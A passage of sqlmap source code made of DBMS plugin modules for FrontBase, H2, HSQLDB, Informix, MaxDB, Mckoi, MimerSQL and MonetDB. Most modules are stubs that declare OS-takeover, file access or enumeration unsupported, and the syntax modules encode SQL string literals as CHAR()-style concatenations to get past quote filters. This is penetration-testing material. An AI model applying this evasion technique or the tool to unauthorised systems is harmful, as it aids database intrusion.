7 |
8 | from lib.core.exception import SqlmapUnsupportedFeatureException
9 | from plugins.generic.takeover import Takeover as GenericTakeover
10 |
11 | class Takeover(GenericTakeover):
12 | def osCmd(self):
13 | errMsg = "on FrontBase it is not possible to execute commands"
14 | raise SqlmapUnsupportedFeatureException(errMsg)
15 |
16 | def osShell(self):
17 | errMsg = "on FrontBase it is not possible to execute commands"
18 | raise SqlmapUnsupportedFeatureException(errMsg)
19 |
20 | def osPwn(self):
21 | errMsg = "on FrontBase it is not possible to establish an "
22 | errMsg += "out-of-band connection"
23 | raise SqlmapUnsupportedFeatureException(errMsg)
24 |
25 | def osSmb(self):
26 | errMsg = "on FrontBase it is not possible to establish an "
27 | errMsg += "out-of-band connection"
28 | raise SqlmapUnsupportedFeatureException(errMsg)
29 |
--------------------------------------------------------------------------------
/plugins/dbms/h2/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.enums import DBMS
9 | from lib.core.settings import H2_SYSTEM_DBS
10 | from lib.core.unescaper import unescaper
11 | from plugins.dbms.h2.enumeration import Enumeration
12 | from plugins.dbms.h2.filesystem import Filesystem
13 | from plugins.dbms.h2.fingerprint import Fingerprint
14 | from plugins.dbms.h2.syntax import Syntax
15 | from plugins.dbms.h2.takeover import Takeover
16 | from plugins.generic.misc import Miscellaneous
17 |
18 | class H2Map(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover):
19 | """
20 | This class defines H2 methods
21 | """
22 |
23 | def __init__(self):
24 | self.excludeDbsList = H2_SYSTEM_DBS
25 |
26 | for cls in self.__class__.__bases__:
27 | cls.__init__(self)
28 |
29 | unescaper[DBMS.H2] = Syntax.escape
30 |
--------------------------------------------------------------------------------
/plugins/dbms/h2/connector.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.exception import SqlmapUnsupportedFeatureException
9 | from plugins.generic.connector import Connector as GenericConnector
10 |
11 | class Connector(GenericConnector):
12 | def connect(self):
13 | errMsg = "on H2 it is not (currently) possible to establish a "
14 | errMsg += "direct connection"
15 | raise SqlmapUnsupportedFeatureException(errMsg)
16 |
--------------------------------------------------------------------------------
/plugins/dbms/h2/filesystem.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.exception import SqlmapUnsupportedFeatureException
9 | from plugins.generic.filesystem import Filesystem as GenericFilesystem
10 |
11 | class Filesystem(GenericFilesystem):
12 | def readFile(self, remoteFile):
13 | errMsg = "on H2 it is not possible to read files"
14 | raise SqlmapUnsupportedFeatureException(errMsg)
15 |
16 | def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False):
17 | errMsg = "on H2 it is not possible to write files"
18 | raise SqlmapUnsupportedFeatureException(errMsg)
19 |
--------------------------------------------------------------------------------
/plugins/dbms/h2/syntax.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.convert import getOrds
9 | from plugins.generic.syntax import Syntax as GenericSyntax
10 |
11 | class Syntax(GenericSyntax):
12 | @staticmethod
13 | def escape(expression, quote=True):
14 | """
15 | >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") == "SELECT CHAR(97)||CHAR(98)||CHAR(99)||CHAR(100)||CHAR(101)||CHAR(102)||CHAR(103)||CHAR(104) FROM foobar"
16 | True
17 | """
18 |
19 | def escaper(value):
20 | return "||".join("CHAR(%d)" % _ for _ in getOrds(value))
21 |
22 | return Syntax._escape(expression, quote, escaper)
23 |
--------------------------------------------------------------------------------
/plugins/dbms/h2/takeover.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.exception import SqlmapUnsupportedFeatureException
9 | from plugins.generic.takeover import Takeover as GenericTakeover
10 |
11 | class Takeover(GenericTakeover):
12 | def osCmd(self):
13 | errMsg = "on H2 it is not possible to execute commands"
14 | raise SqlmapUnsupportedFeatureException(errMsg)
15 |
16 | def osShell(self):
17 | errMsg = "on H2 it is not possible to execute commands"
18 | raise SqlmapUnsupportedFeatureException(errMsg)
19 |
20 | def osPwn(self):
21 | errMsg = "on H2 it is not possible to establish an "
22 | errMsg += "out-of-band connection"
23 | raise SqlmapUnsupportedFeatureException(errMsg)
24 |
25 | def osSmb(self):
26 | errMsg = "on H2 it is not possible to establish an "
27 | errMsg += "out-of-band connection"
28 | raise SqlmapUnsupportedFeatureException(errMsg)
29 |
--------------------------------------------------------------------------------
/plugins/dbms/hsqldb/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.enums import DBMS
9 | from lib.core.settings import HSQLDB_SYSTEM_DBS
10 | from lib.core.unescaper import unescaper
11 | from plugins.dbms.hsqldb.enumeration import Enumeration
12 | from plugins.dbms.hsqldb.filesystem import Filesystem
13 | from plugins.dbms.hsqldb.fingerprint import Fingerprint
14 | from plugins.dbms.hsqldb.syntax import Syntax
15 | from plugins.dbms.hsqldb.takeover import Takeover
16 | from plugins.generic.misc import Miscellaneous
17 |
18 | class HSQLDBMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover):
19 | """
20 | This class defines HSQLDB methods
21 | """
22 |
23 | def __init__(self):
24 | self.excludeDbsList = HSQLDB_SYSTEM_DBS
25 |
26 | for cls in self.__class__.__bases__:
27 | cls.__init__(self)
28 |
29 | unescaper[DBMS.HSQLDB] = Syntax.escape
30 |
--------------------------------------------------------------------------------
/plugins/dbms/hsqldb/syntax.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.convert import getOrds
9 | from plugins.generic.syntax import Syntax as GenericSyntax
10 |
11 | class Syntax(GenericSyntax):
12 | @staticmethod
13 | def escape(expression, quote=True):
14 | """
15 | >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") == "SELECT CHAR(97)||CHAR(98)||CHAR(99)||CHAR(100)||CHAR(101)||CHAR(102)||CHAR(103)||CHAR(104) FROM foobar"
16 | True
17 | """
18 |
19 | def escaper(value):
20 | return "||".join("CHAR(%d)" % _ for _ in getOrds(value))
21 |
22 | return Syntax._escape(expression, quote, escaper)
23 |
--------------------------------------------------------------------------------
/plugins/dbms/hsqldb/takeover.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.exception import SqlmapUnsupportedFeatureException
9 | from plugins.generic.takeover import Takeover as GenericTakeover
10 |
11 | class Takeover(GenericTakeover):
12 | def osCmd(self):
13 | errMsg = "on HSQLDB it is not possible to execute commands"
14 | raise SqlmapUnsupportedFeatureException(errMsg)
15 |
16 | def osShell(self):
17 | errMsg = "on HSQLDB it is not possible to execute commands"
18 | raise SqlmapUnsupportedFeatureException(errMsg)
19 |
20 | def osPwn(self):
21 | errMsg = "on HSQLDB it is not possible to establish an "
22 | errMsg += "out-of-band connection"
23 | raise SqlmapUnsupportedFeatureException(errMsg)
24 |
25 | def osSmb(self):
26 | errMsg = "on HSQLDB it is not possible to establish an "
27 | errMsg += "out-of-band connection"
28 | raise SqlmapUnsupportedFeatureException(errMsg)
29 |
--------------------------------------------------------------------------------
/plugins/dbms/informix/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.enums import DBMS
9 | from lib.core.settings import INFORMIX_SYSTEM_DBS
10 | from lib.core.unescaper import unescaper
11 |
12 | from plugins.dbms.informix.enumeration import Enumeration
13 | from plugins.dbms.informix.filesystem import Filesystem
14 | from plugins.dbms.informix.fingerprint import Fingerprint
15 | from plugins.dbms.informix.syntax import Syntax
16 | from plugins.dbms.informix.takeover import Takeover
17 | from plugins.generic.misc import Miscellaneous
18 |
19 | class InformixMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover):
20 | """
21 | This class defines Informix methods
22 | """
23 |
24 | def __init__(self):
25 | self.excludeDbsList = INFORMIX_SYSTEM_DBS
26 |
27 | for cls in self.__class__.__bases__:
28 | cls.__init__(self)
29 |
30 | unescaper[DBMS.INFORMIX] = Syntax.escape
31 |
--------------------------------------------------------------------------------
/plugins/dbms/informix/enumeration.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.data import logger
9 | from plugins.generic.enumeration import Enumeration as GenericEnumeration
10 |
11 | class Enumeration(GenericEnumeration):
12 | def searchDb(self):
13 | warnMsg = "on Informix searching of databases is not implemented"
14 | logger.warning(warnMsg)
15 |
16 | return []
17 |
18 | def searchTable(self):
19 | warnMsg = "on Informix searching of tables is not implemented"
20 | logger.warning(warnMsg)
21 |
22 | return []
23 |
24 | def searchColumn(self):
25 | warnMsg = "on Informix searching of columns is not implemented"
26 | logger.warning(warnMsg)
27 |
28 | return []
29 |
30 | def search(self):
31 | warnMsg = "on Informix search option is not available"
32 | logger.warning(warnMsg)
33 |
34 | def getStatements(self):
35 | warnMsg = "on Informix it is not possible to enumerate the SQL statements"
36 | logger.warning(warnMsg)
37 |
38 | return []
39 |
--------------------------------------------------------------------------------
/plugins/dbms/informix/filesystem.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from plugins.generic.filesystem import Filesystem as GenericFilesystem
9 |
10 | class Filesystem(GenericFilesystem):
11 | pass
12 |
--------------------------------------------------------------------------------
/plugins/dbms/informix/takeover.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from plugins.generic.takeover import Takeover as GenericTakeover
9 |
10 | class Takeover(GenericTakeover):
11 | def __init__(self):
12 | self.__basedir = None
13 | self.__datadir = None
14 |
15 | GenericTakeover.__init__(self)
16 |
--------------------------------------------------------------------------------
/plugins/dbms/maxdb/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.enums import DBMS
9 | from lib.core.settings import MAXDB_SYSTEM_DBS
10 | from lib.core.unescaper import unescaper
11 | from plugins.dbms.maxdb.enumeration import Enumeration
12 | from plugins.dbms.maxdb.filesystem import Filesystem
13 | from plugins.dbms.maxdb.fingerprint import Fingerprint
14 | from plugins.dbms.maxdb.syntax import Syntax
15 | from plugins.dbms.maxdb.takeover import Takeover
16 | from plugins.generic.misc import Miscellaneous
17 |
18 | class MaxDBMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover):
19 | """
20 | This class defines SAP MaxDB methods
21 | """
22 |
23 | def __init__(self):
24 | self.excludeDbsList = MAXDB_SYSTEM_DBS
25 |
26 | for cls in self.__class__.__bases__:
27 | cls.__init__(self)
28 |
29 | unescaper[DBMS.MAXDB] = Syntax.escape
30 |
--------------------------------------------------------------------------------
/plugins/dbms/maxdb/connector.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.exception import SqlmapUnsupportedFeatureException
9 | from plugins.generic.connector import Connector as GenericConnector
10 |
11 | class Connector(GenericConnector):
12 | def connect(self):
13 | errMsg = "on SAP MaxDB it is not (currently) possible to establish a "
14 | errMsg += "direct connection"
15 | raise SqlmapUnsupportedFeatureException(errMsg)
16 |
--------------------------------------------------------------------------------
/plugins/dbms/maxdb/filesystem.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.exception import SqlmapUnsupportedFeatureException
9 | from plugins.generic.filesystem import Filesystem as GenericFilesystem
10 |
11 | class Filesystem(GenericFilesystem):
12 | def readFile(self, remoteFile):
13 | errMsg = "on SAP MaxDB reading of files is not supported"
14 | raise SqlmapUnsupportedFeatureException(errMsg)
15 |
16 | def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False):
17 | errMsg = "on SAP MaxDB writing of files is not supported"
18 | raise SqlmapUnsupportedFeatureException(errMsg)
19 |
--------------------------------------------------------------------------------
/plugins/dbms/maxdb/syntax.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from plugins.generic.syntax import Syntax as GenericSyntax
9 |
10 | class Syntax(GenericSyntax):
11 | @staticmethod
12 | def escape(expression, quote=True):
13 | """
14 | >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") == "SELECT 'abcdefgh' FROM foobar"
15 | True
16 | """
17 |
18 | return expression
19 |
--------------------------------------------------------------------------------
/plugins/dbms/maxdb/takeover.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.exception import SqlmapUnsupportedFeatureException
9 | from plugins.generic.takeover import Takeover as GenericTakeover
10 |
11 | class Takeover(GenericTakeover):
12 | def osCmd(self):
13 | errMsg = "on SAP MaxDB it is not possible to execute commands"
14 | raise SqlmapUnsupportedFeatureException(errMsg)
15 |
16 | def osShell(self):
17 | errMsg = "on SAP MaxDB it is not possible to execute commands"
18 | raise SqlmapUnsupportedFeatureException(errMsg)
19 |
20 | def osPwn(self):
21 | errMsg = "on SAP MaxDB it is not possible to establish an "
22 | errMsg += "out-of-band connection"
23 | raise SqlmapUnsupportedFeatureException(errMsg)
24 |
25 | def osSmb(self):
26 | errMsg = "on SAP MaxDB it is not possible to establish an "
27 | errMsg += "out-of-band connection"
28 | raise SqlmapUnsupportedFeatureException(errMsg)
29 |
--------------------------------------------------------------------------------
/plugins/dbms/mckoi/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.enums import DBMS
9 | from lib.core.settings import MCKOI_SYSTEM_DBS
10 | from lib.core.unescaper import unescaper
11 | from plugins.dbms.mckoi.enumeration import Enumeration
12 | from plugins.dbms.mckoi.filesystem import Filesystem
13 | from plugins.dbms.mckoi.fingerprint import Fingerprint
14 | from plugins.dbms.mckoi.syntax import Syntax
15 | from plugins.dbms.mckoi.takeover import Takeover
16 | from plugins.generic.misc import Miscellaneous
17 |
18 | class MckoiMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover):
19 | """
20 | This class defines Mckoi methods
21 | """
22 |
23 | def __init__(self):
24 | self.excludeDbsList = MCKOI_SYSTEM_DBS
25 |
26 | for cls in self.__class__.__bases__:
27 | cls.__init__(self)
28 |
29 | unescaper[DBMS.MCKOI] = Syntax.escape
30 |
--------------------------------------------------------------------------------
/plugins/dbms/mckoi/connector.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.exception import SqlmapUnsupportedFeatureException
9 | from plugins.generic.connector import Connector as GenericConnector
10 |
11 | class Connector(GenericConnector):
12 | def connect(self):
13 | errMsg = "on Mckoi it is not (currently) possible to establish a "
14 | errMsg += "direct connection"
15 | raise SqlmapUnsupportedFeatureException(errMsg)
16 |
--------------------------------------------------------------------------------
/plugins/dbms/mckoi/filesystem.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.exception import SqlmapUnsupportedFeatureException
9 | from plugins.generic.filesystem import Filesystem as GenericFilesystem
10 |
11 | class Filesystem(GenericFilesystem):
12 | def readFile(self, remoteFile):
13 | errMsg = "on Mckoi it is not possible to read files"
14 | raise SqlmapUnsupportedFeatureException(errMsg)
15 |
16 | def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False):
17 | errMsg = "on Mckoi it is not possible to write files"
18 | raise SqlmapUnsupportedFeatureException(errMsg)
19 |
--------------------------------------------------------------------------------
/plugins/dbms/mckoi/syntax.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from plugins.generic.syntax import Syntax as GenericSyntax
9 |
10 | class Syntax(GenericSyntax):
11 | @staticmethod
12 | def escape(expression, quote=True):
13 | """
14 | >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") == "SELECT 'abcdefgh' FROM foobar"
15 | True
16 | """
17 |
18 | return expression
19 |
--------------------------------------------------------------------------------
/plugins/dbms/mckoi/takeover.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.exception import SqlmapUnsupportedFeatureException
9 | from plugins.generic.takeover import Takeover as GenericTakeover
10 |
11 | class Takeover(GenericTakeover):
12 | def osCmd(self):
13 | errMsg = "on Mckoi it is not possible to execute commands"
14 | raise SqlmapUnsupportedFeatureException(errMsg)
15 |
16 | def osShell(self):
17 | errMsg = "on Mckoi it is not possible to execute commands"
18 | raise SqlmapUnsupportedFeatureException(errMsg)
19 |
20 | def osPwn(self):
21 | errMsg = "on Mckoi it is not possible to establish an "
22 | errMsg += "out-of-band connection"
23 | raise SqlmapUnsupportedFeatureException(errMsg)
24 |
25 | def osSmb(self):
26 | errMsg = "on Mckoi it is not possible to establish an "
27 | errMsg += "out-of-band connection"
28 | raise SqlmapUnsupportedFeatureException(errMsg)
29 |
--------------------------------------------------------------------------------
/plugins/dbms/mimersql/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.enums import DBMS
9 | from lib.core.settings import MIMERSQL_SYSTEM_DBS
10 | from lib.core.unescaper import unescaper
11 |
12 | from plugins.dbms.mimersql.enumeration import Enumeration
13 | from plugins.dbms.mimersql.filesystem import Filesystem
14 | from plugins.dbms.mimersql.fingerprint import Fingerprint
15 | from plugins.dbms.mimersql.syntax import Syntax
16 | from plugins.dbms.mimersql.takeover import Takeover
17 | from plugins.generic.misc import Miscellaneous
18 |
19 | class MimerSQLMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover):
20 | """
21 | This class defines MimerSQL methods
22 | """
23 |
24 | def __init__(self):
25 | self.excludeDbsList = MIMERSQL_SYSTEM_DBS
26 |
27 | for cls in self.__class__.__bases__:
28 | cls.__init__(self)
29 |
30 | unescaper[DBMS.MIMERSQL] = Syntax.escape
31 |
--------------------------------------------------------------------------------
/plugins/dbms/mimersql/enumeration.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.data import logger
9 | from plugins.generic.enumeration import Enumeration as GenericEnumeration
10 |
11 | class Enumeration(GenericEnumeration):
12 | def getPasswordHashes(self):
13 | warnMsg = "on MimerSQL it is not possible to enumerate password hashes"
14 | logger.warning(warnMsg)
15 |
16 | return {}
17 |
18 | def getStatements(self):
19 | warnMsg = "on MimerSQL it is not possible to enumerate the SQL statements"
20 | logger.warning(warnMsg)
21 |
22 | return []
23 |
24 | def getRoles(self, *args, **kwargs):
25 | warnMsg = "on MimerSQL it is not possible to enumerate the user roles"
26 | logger.warning(warnMsg)
27 |
28 | return {}
29 |
30 | def getHostname(self):
31 | warnMsg = "on MimerSQL it is not possible to enumerate the hostname"
32 | logger.warning(warnMsg)
33 |
--------------------------------------------------------------------------------
/plugins/dbms/mimersql/filesystem.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from plugins.generic.filesystem import Filesystem as GenericFilesystem
9 |
10 | class Filesystem(GenericFilesystem):
11 | pass
12 |
--------------------------------------------------------------------------------
/plugins/dbms/mimersql/syntax.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.convert import getOrds
9 | from plugins.generic.syntax import Syntax as GenericSyntax
10 |
11 | class Syntax(GenericSyntax):
12 | @staticmethod
13 | def escape(expression, quote=True):
14 | """
15 | >>> from lib.core.common import Backend
16 | >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") == "SELECT UNICODE_CHAR(97)||UNICODE_CHAR(98)||UNICODE_CHAR(99)||UNICODE_CHAR(100)||UNICODE_CHAR(101)||UNICODE_CHAR(102)||UNICODE_CHAR(103)||UNICODE_CHAR(104) FROM foobar"
17 | True
18 | """
19 |
20 | def escaper(value):
21 | return "||".join("UNICODE_CHAR(%d)" % _ for _ in getOrds(value))
22 |
23 | return Syntax._escape(expression, quote, escaper)
24 |
--------------------------------------------------------------------------------
/plugins/dbms/mimersql/takeover.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.exception import SqlmapUnsupportedFeatureException
9 | from plugins.generic.takeover import Takeover as GenericTakeover
10 |
11 | class Takeover(GenericTakeover):
12 | def osCmd(self):
13 | errMsg = "on MimerSQL it is not possible to execute commands"
14 | raise SqlmapUnsupportedFeatureException(errMsg)
15 |
16 | def osShell(self):
17 | errMsg = "on MimerSQL it is not possible to execute commands"
18 | raise SqlmapUnsupportedFeatureException(errMsg)
19 |
20 | def osPwn(self):
21 | errMsg = "on MimerSQL it is not possible to establish an "
22 | errMsg += "out-of-band connection"
23 | raise SqlmapUnsupportedFeatureException(errMsg)
24 |
25 | def osSmb(self):
26 | errMsg = "on MimerSQL it is not possible to establish an "
27 | errMsg += "out-of-band connection"
28 | raise SqlmapUnsupportedFeatureException(errMsg)
29 |
--------------------------------------------------------------------------------
/plugins/dbms/monetdb/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.enums import DBMS
9 | from lib.core.settings import MONETDB_SYSTEM_DBS
10 | from lib.core.unescaper import unescaper
11 |
12 | from plugins.dbms.monetdb.enumeration import Enumeration
13 | from plugins.dbms.monetdb.filesystem import Filesystem
14 | from plugins.dbms.monetdb.fingerprint import Fingerprint
15 | from plugins.dbms.monetdb.syntax import Syntax
16 | from plugins.dbms.monetdb.takeover import Takeover
17 | from plugins.generic.misc import Miscellaneous
18 |
19 | class MonetDBMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover):
20 | """
21 | This class defines MonetDB methods
22 | """
23 |
24 | def __init__(self):
25 | self.excludeDbsList = MONETDB_SYSTEM_DBS
26 |
27 | for cls in self.__class__.__bases__:
28 | cls.__init__(self)
29 |
30 | unescaper[DBMS.MONETDB] = Syntax.escape
31 |
--------------------------------------------------------------------------------
/plugins/dbms/monetdb/enumeration.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.data import logger
9 | from plugins.generic.enumeration import Enumeration as GenericEnumeration
10 |
11 | class Enumeration(GenericEnumeration):
12 | def getPasswordHashes(self):
13 | warnMsg = "on MonetDB it is not possible to enumerate password hashes"
14 | logger.warning(warnMsg)
15 |
16 | return {}
17 |
18 | def getStatements(self):
19 | warnMsg = "on MonetDB it is not possible to enumerate the SQL statements"
20 | logger.warning(warnMsg)
21 |
22 | return []
23 |
24 | def getPrivileges(self, *args, **kwargs):
25 | warnMsg = "on MonetDB it is not possible to enumerate the user privileges"
26 | logger.warning(warnMsg)
27 |
28 | return {}
29 |
30 | def getRoles(self, *args, **kwargs):
31 | warnMsg = "on MonetDB it is not possible to enumerate the user roles"
32 | logger.warning(warnMsg)
33 |
34 | return {}
35 |
36 | def getHostname(self):
37 | warnMsg = "on MonetDB it is not possible to enumerate the hostname"
38 | logger.warning(warnMsg)
39 |
--------------------------------------------------------------------------------
/plugins/dbms/monetdb/filesystem.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from plugins.generic.filesystem import Filesystem as GenericFilesystem
9 |
10 | class Filesystem(GenericFilesystem):
11 | pass
12 |
--------------------------------------------------------------------------------
/plugins/dbms/monetdb/syntax.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.convert import getOrds
9 | from plugins.generic.syntax import Syntax as GenericSyntax
10 |
11 | class Syntax(GenericSyntax):
12 | @staticmethod
13 | def escape(expression, quote=True):
14 | """
15 | >>> from lib.core.common import Backend
16 | >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") == "SELECT CODE(97)||CODE(98)||CODE(99)||CODE(100)||CODE(101)||CODE(102)||CODE(103)||CODE(104) FROM foobar"
17 | True
18 | """
19 |
20 | def escaper(value):
21 | return "||".join("CODE(%d)" % _ for _ in getOrds(value))
22 |
23 | return Syntax._escape(expression, quote, escaper)
24 |
--------------------------------------------------------------------------------
/plugins/dbms/monetdb/takeover.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.exception import SqlmapUnsupportedFeatureException
9 | from plugins.generic.takeover import Takeover as GenericTakeover
10 |
11 | class Takeover(GenericTakeover):
12 | def osCmd(self):
13 | errMsg = "on MonetDB it is not possible to execute commands"
14 | raise SqlmapUnsupportedFeatureException(errMsg)
15 |
16 | def osShell(self):
17 | errMsg = "on MonetDB it is not possible to execute commands"
18 | raise SqlmapUnsupportedFeatureException(errMsg)
19 |
20 | def osPwn(self):
21 | errMsg = "on MonetDB it is not possible to establish an "
22 | errMsg += "out-of-band connection"
23 | raise SqlmapUnsupportedFeatureException(errMsg)
24 |
25 | def osSmb(self):
26 | errMsg = "on MonetDB it is not possible to establish an "
27 | errMsg += "out-of-band connection"
28 | raise SqlmapUnsupportedFeatureException(errMsg)
29 |
--------------------------------------------------------------------------------
/plugins/dbms/mssqlserver/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.enums import DBMS
9 | from lib.core.settings import MSSQL_SYSTEM_DBS
10 | from lib.core.unescaper import unescaper
11 | from plugins.dbms.mssqlserver.enumeration import Enumeration
12 | from plugins.dbms.mssqlserver.filesystem import Filesystem
13 | from plugins.dbms.mssqlserver.fingerprint import Fingerprint
14 | from plugins.dbms.mssqlserver.syntax import Syntax
15 | from plugins.dbms.mssqlserver.takeover import Takeover
16 | from plugins.generic.misc import Miscellaneous
17 |
